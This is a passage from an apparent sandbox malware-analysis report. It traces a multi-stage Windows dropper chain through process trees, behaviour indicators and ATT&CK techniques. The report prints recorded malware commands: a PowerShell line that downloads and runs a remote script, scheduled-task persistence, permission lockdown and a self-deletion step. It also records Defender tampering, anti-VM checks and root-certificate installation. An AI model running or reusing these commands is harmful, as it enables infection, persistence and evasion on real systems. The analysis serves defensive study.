e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	sqlcmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	legenda.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1804 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

548 powershell.exe

pid	process
1804	PING.EXE

pid	process
548	powershell.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

Processes:

tz1157.exev2583uL.exew68GN42.exexeHYI50.exeworld.exeYJROPMCQjRX9.exepowershell.exemyp.exemyp.exeserv.exe

pid	process
1000	tz1157.exe
1000	tz1157.exe
1996	v2583uL.exe
1996	v2583uL.exe
1988	w68GN42.exe
1988	w68GN42.exe
1956	xeHYI50.exe
1956	xeHYI50.exe
1736	world.exe
336	YJROPMCQjRX9.exe
336	YJROPMCQjRX9.exe
336	YJROPMCQjRX9.exe
336	YJROPMCQjRX9.exe
336	YJROPMCQjRX9.exe
1736	world.exe
548	powershell.exe
1904	myp.exe
1904	myp.exe
856	myp.exe
856	myp.exe
1948	serv.exe
1948	serv.exe
1948	serv.exe
1948	serv.exe
1948	serv.exe
1948	serv.exe
1948	serv.exe
1948	serv.exe
1948	serv.exe
1948	serv.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

tz1157.exev2583uL.exew68GN42.exexeHYI50.exeworld.exepowershell.exemyp.exemyp.exeserv.exe

description	pid	process
Token: SeDebugPrivilege	1000	tz1157.exe
Token: SeDebugPrivilege	1996	v2583uL.exe
Token: SeDebugPrivilege	1988	w68GN42.exe
Token: SeDebugPrivilege	1956	xeHYI50.exe
Token: SeDebugPrivilege	1736	world.exe
Token: SeDebugPrivilege	548	powershell.exe
Token: SeDebugPrivilege	1904	myp.exe
Token: SeDebugPrivilege	856	myp.exe
Token: SeShutdownPrivilege	1948	serv.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

Downloader.exeDownloader.exe

pid process

520 Downloader.exe
2044 Downloader.exe

pid	process
520	Downloader.exe
2044	Downloader.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a896f1696e17908b35191251050dcbf5.exezap7090.exezap7497.exezap1297.exey65JT16.exelegenda.exe

description	pid	process	target process
PID 1984 wrote to memory of 840	1984	a896f1696e17908b35191251050dcbf5.exe	zap7090.exe
PID 1984 wrote to memory of 840	1984	a896f1696e17908b35191251050dcbf5.exe	zap7090.exe
PID 1984 wrote to memory of 840	1984	a896f1696e17908b35191251050dcbf5.exe	zap7090.exe
PID 1984 wrote to memory of 840	1984	a896f1696e17908b35191251050dcbf5.exe	zap7090.exe
PID 1984 wrote to memory of 840	1984	a896f1696e17908b35191251050dcbf5.exe	zap7090.exe
PID 1984 wrote to memory of 840	1984	a896f1696e17908b35191251050dcbf5.exe	zap7090.exe
PID 1984 wrote to memory of 840	1984	a896f1696e17908b35191251050dcbf5.exe	zap7090.exe
PID 840 wrote to memory of 756	840	zap7090.exe	zap7497.exe
PID 840 wrote to memory of 756	840	zap7090.exe	zap7497.exe
PID 840 wrote to memory of 756	840	zap7090.exe	zap7497.exe
PID 840 wrote to memory of 756	840	zap7090.exe	zap7497.exe
PID 840 wrote to memory of 756	840	zap7090.exe	zap7497.exe
PID 840 wrote to memory of 756	840	zap7090.exe	zap7497.exe
PID 840 wrote to memory of 756	840	zap7090.exe	zap7497.exe
PID 756 wrote to memory of 268	756	zap7497.exe	zap1297.exe
PID 756 wrote to memory of 268	756	zap7497.exe	zap1297.exe
PID 756 wrote to memory of 268	756	zap7497.exe	zap1297.exe
PID 756 wrote to memory of 268	756	zap7497.exe	zap1297.exe
PID 756 wrote to memory of 268	756	zap7497.exe	zap1297.exe
PID 756 wrote to memory of 268	756	zap7497.exe	zap1297.exe
PID 756 wrote to memory of 268	756	zap7497.exe	zap1297.exe
PID 268 wrote to memory of 1000	268	zap1297.exe	tz1157.exe
PID 268 wrote to memory of 1000	268	zap1297.exe	tz1157.exe
PID 268 wrote to memory of 1000	268	zap1297.exe	tz1157.exe
PID 268 wrote to memory of 1000	268	zap1297.exe	tz1157.exe
PID 268 wrote to memory of 1000	268	zap1297.exe	tz1157.exe
PID 268 wrote to memory of 1000	268	zap1297.exe	tz1157.exe
PID 268 wrote to memory of 1000	268	zap1297.exe	tz1157.exe
PID 268 wrote to memory of 1996	268	zap1297.exe	v2583uL.exe
PID 268 wrote to memory of 1996	268	zap1297.exe	v2583uL.exe
PID 268 wrote to memory of 1996	268	zap1297.exe	v2583uL.exe
PID 268 wrote to memory of 1996	268	zap1297.exe	v2583uL.exe
PID 268 wrote to memory of 1996	268	zap1297.exe	v2583uL.exe
PID 268 wrote to memory of 1996	268	zap1297.exe	v2583uL.exe
PID 268 wrote to memory of 1996	268	zap1297.exe	v2583uL.exe
PID 756 wrote to memory of 1988	756	zap7497.exe	w68GN42.exe
PID 756 wrote to memory of 1988	756	zap7497.exe	w68GN42.exe
PID 756 wrote to memory of 1988	756	zap7497.exe	w68GN42.exe
PID 756 wrote to memory of 1988	756	zap7497.exe	w68GN42.exe
PID 756 wrote to memory of 1988	756	zap7497.exe	w68GN42.exe
PID 756 wrote to memory of 1988	756	zap7497.exe	w68GN42.exe
PID 756 wrote to memory of 1988	756	zap7497.exe	w68GN42.exe
PID 840 wrote to memory of 1956	840	zap7090.exe	xeHYI50.exe
PID 840 wrote to memory of 1956	840	zap7090.exe	xeHYI50.exe
PID 840 wrote to memory of 1956	840	zap7090.exe	xeHYI50.exe
PID 840 wrote to memory of 1956	840	zap7090.exe	xeHYI50.exe
PID 840 wrote to memory of 1956	840	zap7090.exe	xeHYI50.exe
PID 840 wrote to memory of 1956	840	zap7090.exe	xeHYI50.exe
PID 840 wrote to memory of 1956	840	zap7090.exe	xeHYI50.exe
PID 1984 wrote to memory of 1992	1984	a896f1696e17908b35191251050dcbf5.exe	y65JT16.exe
PID 1984 wrote to memory of 1992	1984	a896f1696e17908b35191251050dcbf5.exe	y65JT16.exe
PID 1984 wrote to memory of 1992	1984	a896f1696e17908b35191251050dcbf5.exe	y65JT16.exe
PID 1984 wrote to memory of 1992	1984	a896f1696e17908b35191251050dcbf5.exe	y65JT16.exe
PID 1984 wrote to memory of 1992	1984	a896f1696e17908b35191251050dcbf5.exe	y65JT16.exe
PID 1984 wrote to memory of 1992	1984	a896f1696e17908b35191251050dcbf5.exe	y65JT16.exe
PID 1984 wrote to memory of 1992	1984	a896f1696e17908b35191251050dcbf5.exe	y65JT16.exe
PID 1992 wrote to memory of 1016	1992	y65JT16.exe	legenda.exe
PID 1992 wrote to memory of 1016	1992	y65JT16.exe	legenda.exe
PID 1992 wrote to memory of 1016	1992	y65JT16.exe	legenda.exe
PID 1992 wrote to memory of 1016	1992	y65JT16.exe	legenda.exe
PID 1992 wrote to memory of 1016	1992	y65JT16.exe	legenda.exe
PID 1992 wrote to memory of 1016	1992	y65JT16.exe	legenda.exe
PID 1992 wrote to memory of 1016	1992	y65JT16.exe	legenda.exe
PID 1016 wrote to memory of 640	1016	legenda.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\a896f1696e17908b35191251050dcbf5.exe
"C:\Users\Admin\AppData\Local\Temp\a896f1696e17908b35191251050dcbf5.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1984

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap7090.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap7090.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:840

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap7497.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap7497.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:756

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap1297.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap1297.exe
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:268

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1157.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1157.exe
5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1000

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v2583uL.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v2583uL.exe
5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1996

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w68GN42.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w68GN42.exe
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xeHYI50.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xeHYI50.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1956

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y65JT16.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y65JT16.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1992

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
"C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1016

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe" /F
4⤵
- Creates scheduled task(s)
PID:640

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legenda.exe" /P "Admin:N"&&CACLS "legenda.exe" /P "Admin:R" /E&&echo Y|CACLS "..\f22b669919" /P "Admin:N"&&CACLS "..\f22b669919" /P "Admin:R" /E&&Exit
4⤵
PID:2040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5⤵
PID:1496

C:\Windows\SysWOW64\cacls.exe
CACLS "legenda.exe" /P "Admin:N"
5⤵
PID:856

C:\Windows\SysWOW64\cacls.exe
CACLS "legenda.exe" /P "Admin:R" /E
5⤵
PID:1256

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5⤵
PID:1128

C:\Windows\SysWOW64\cacls.exe
CACLS "..\f22b669919" /P "Admin:N"
5⤵
PID:1480

C:\Windows\SysWOW64\cacls.exe
CACLS "..\f22b669919" /P "Admin:R" /E
5⤵
PID:1796

C:\Users\Admin\AppData\Local\Temp\1000097001\world.exe
"C:\Users\Admin\AppData\Local\Temp\1000097001\world.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1736

C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe
"C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe"
4⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks system information in the registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks for VirtualBox DLLs, possible anti-VM trick
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1948

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
4⤵
- Loads dropped DLL
PID:1776

C:\Users\Admin\AppData\Local\Temp\1000118001\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\1000118001\svchost.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:512

C:\Users\Admin\AppData\Roaming\1000120000\YJROPMCQjRX9.exe
"C:\Users\Admin\AppData\Roaming\1000120000\YJROPMCQjRX9.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:336

C:\Users\Admin\AppData\Local\Temp\1000123001\Downloader.exe
"C:\Users\Admin\AppData\Local\Temp\1000123001\Downloader.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:520

C:\Users\Admin\AppData\Local\Temp\1000123001\myp.exe
"C:\Users\Admin\AppData\Local\Temp\1000123001\myp.exe" 0
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1904

C:\Users\Admin\AppData\Local\Temp\1000123001\clip.exe
"C:\Users\Admin\AppData\Local\Temp\1000123001\clip.exe" 0
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:1600

C:\Users\Admin\AppData\Local\Temp\1000124001\Downloader.exe
"C:\Users\Admin\AppData\Local\Temp\1000124001\Downloader.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:2044

C:\Users\Admin\AppData\Local\Temp\1000124001\myp.exe
"C:\Users\Admin\AppData\Local\Temp\1000124001\myp.exe" 0
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:856

C:\Users\Admin\AppData\Local\Temp\1000124001\clip.exe
"C:\Users\Admin\AppData\Local\Temp\1000124001\clip.exe" 0
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:872

C:\Users\Admin\AppData\Local\Temp\1000125001\sqlcmd.exe
"C:\Users\Admin\AppData\Local\Temp\1000125001\sqlcmd.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:1608

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"
5⤵
PID:1604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')
6⤵
- Blocklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:548

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000125001\sqlcmd.exe" >> NUL
5⤵
PID:1984

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:1804

C:\Windows\system32\taskeng.exe
taskeng.exe {B7053CE9-8F4F-4C6A-BABF-DBB8B27DBC5C} S-1-5-21-1914912747-3343861975-731272777-1000:TMRJMUQF\Admin:Interactive:[1]
1⤵
PID:908

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
2⤵
- Executes dropped EXE
PID:840

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

Virtualization/Sandbox Evasion

System Information Discovery